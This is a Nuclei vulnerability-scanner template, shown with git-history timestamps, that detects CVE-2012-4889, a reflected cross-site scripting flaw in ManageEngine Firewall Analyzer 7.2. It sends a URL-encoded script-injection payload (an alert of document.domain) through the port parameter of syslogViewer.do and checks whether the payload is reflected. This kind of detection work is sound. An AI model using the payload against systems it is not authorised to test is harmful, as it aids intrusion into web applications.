nuclei-templates/cves/2012/CVE-2012-4889.yaml

33 lines
1.1 KiB
YAML
Raw Normal View History

2021-07-24 00:18:30 +00:00
id: CVE-2012-4889
info:
2021-07-24 00:20:53 +00:00
name: ManageEngine Firewall Analyzer 7.2 - Reflected Cross Site Scripting (XSS)
2021-07-24 00:18:30 +00:00
author: daffainfo
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.
reference: |
- https://www.securityfocus.com/bid/52841/info
- https://nvd.nist.gov/vuln/detail/CVE-2012-4889
2021-07-24 04:30:22 +00:00
tags: cve,cve2012,xss,manageengine
2021-07-24 00:18:30 +00:00
requests:
- method: GET
path:
2021-07-24 04:30:22 +00:00
- "{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-07-24 00:18:30 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-07-24 04:30:22 +00:00
- '</script><script>alert(document.domain)</script>'
2021-07-24 00:18:30 +00:00
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200